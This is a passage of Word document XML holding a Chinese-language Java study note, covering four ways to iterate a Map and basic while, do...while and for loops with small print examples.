    <w:p w14:paraId="52A9BBFC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    map.put("3", "value3");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549D833E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C0D36A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    //</w:t>
      </w:r>
      <w:r>
        <w:t>第一种：普遍使用，二次取值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357B66F2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    System.out.println("</w:t>
      </w:r>
      <w:r>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>Map.keySet</w:t>
      </w:r>
      <w:r>
        <w:t>遍历</w:t>
      </w:r>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2918CC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    for (String key : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>map.keySet()</w:t>
      </w:r>
      <w:r>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A91D80" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        System.out.println("key= "+ key + " and value= " + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>map.get(key)</w:t>
      </w:r>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DDBE12" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD19B12" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3036D5FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    //</w:t>
      </w:r>
      <w:r>
        <w:t>第二种</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：迭代</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BBF339" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    System.out.println("</w:t>
      </w:r>
      <w:r>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>Map.entrySet</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>iterator</w:t>
      </w:r>
      <w:r>
        <w:t>遍历</w:t>
      </w:r>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6EA0E8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Iterator&lt;Map.Entry&lt;String, String&gt;&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> it = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>map.entrySet().iterator()</w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121FBDE6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    while (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>it.hasNext()</w:t>
      </w:r>
      <w:r>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C4DD52" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Map.Entry&lt;String, String&gt; entry = it.next();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296B788B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>System.out.println("key= " + entry.getKey() + " and value= " + entry.getValue());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFC399A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593A78E6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333CF2FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    //</w:t>
      </w:r>
      <w:r>
        <w:t>第三种：推荐，尤其是容量大时</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444288CF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    System.out.println("</w:t>
      </w:r>
      <w:r>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>Map.entrySet</w:t>
      </w:r>
      <w:r>
        <w:t>遍历</w:t>
      </w:r>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>value");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4787502E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    for (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Map.Entry&lt;String, String&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> entry : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>map.entrySet()</w:t>
      </w:r>
      <w:r>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1BCC87" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        System.out.println("key= " + entry.getKey() + " and value= " + entry.getValue());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E822C63" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EDA789" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7240F6E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    //</w:t>
      </w:r>
      <w:r>
        <w:t>第四种</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414BF3DA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    System.out.println("</w:t>
      </w:r>
      <w:r>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>Map.values()</w:t>
      </w:r>
      <w:r>
        <w:t>遍历所有的</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>，但不能遍历</w:t>
      </w:r>
      <w:r>
        <w:t>key");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D6C225" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    for (String v : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>map.values()</w:t>
      </w:r>
      <w:r>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE2D803" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        System.out.println("value= " + v);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F85CB60" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD7E504" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17797457" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>循环结构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2970F5B0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主要有三种循环结构：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8E30BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>循环</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F0874C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>do...while</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>循环</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608330C5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>循环</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F2DE52" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>循环</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3747B7B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>while( bool ){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555FF611" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>循环内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6FDD6A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278E1349" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1086A0F4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Eg:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D9646B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>public class Test {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EE240E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE9F5FF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      int x = 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8EE100" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      while( x &lt; 20 ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5A7AAB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         System.out.print("value of x : " + x );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6320B867" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         x++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794F2FCA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         System.out.print("\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE9598F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1DA27C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EF394E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F761908" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>do...while</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>循环</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AB54D8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>do {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E2D5EE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">       //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54360837" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}while(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>布尔表达式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E61074" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10121041" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public class Test {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2006467C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   public static void main(String[] args){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCAD7B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      int x = 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC26B10" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009207A7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      do{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3C460A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">         System.out.print("value of x : " + x );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C57EC91" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">         x++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241B2A27" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">         System.out.print("\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412CEBD7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      }while( x &lt; 20 );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7360707E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C8865C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D7698B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>循环</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF89F1C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>for(</w:t>
      </w:r>
      <w:r>
        <w:t>初始化</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:t>布尔表达式</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r>
        <w:t>更新</w:t>
      </w:r>
      <w:r>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFCD60E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    //</w:t>
      </w:r>
      <w:r>
        <w:t>代码语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ACAB9C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F402EF3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C5611B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class Test {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF299FB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620A1FBA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397011D7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
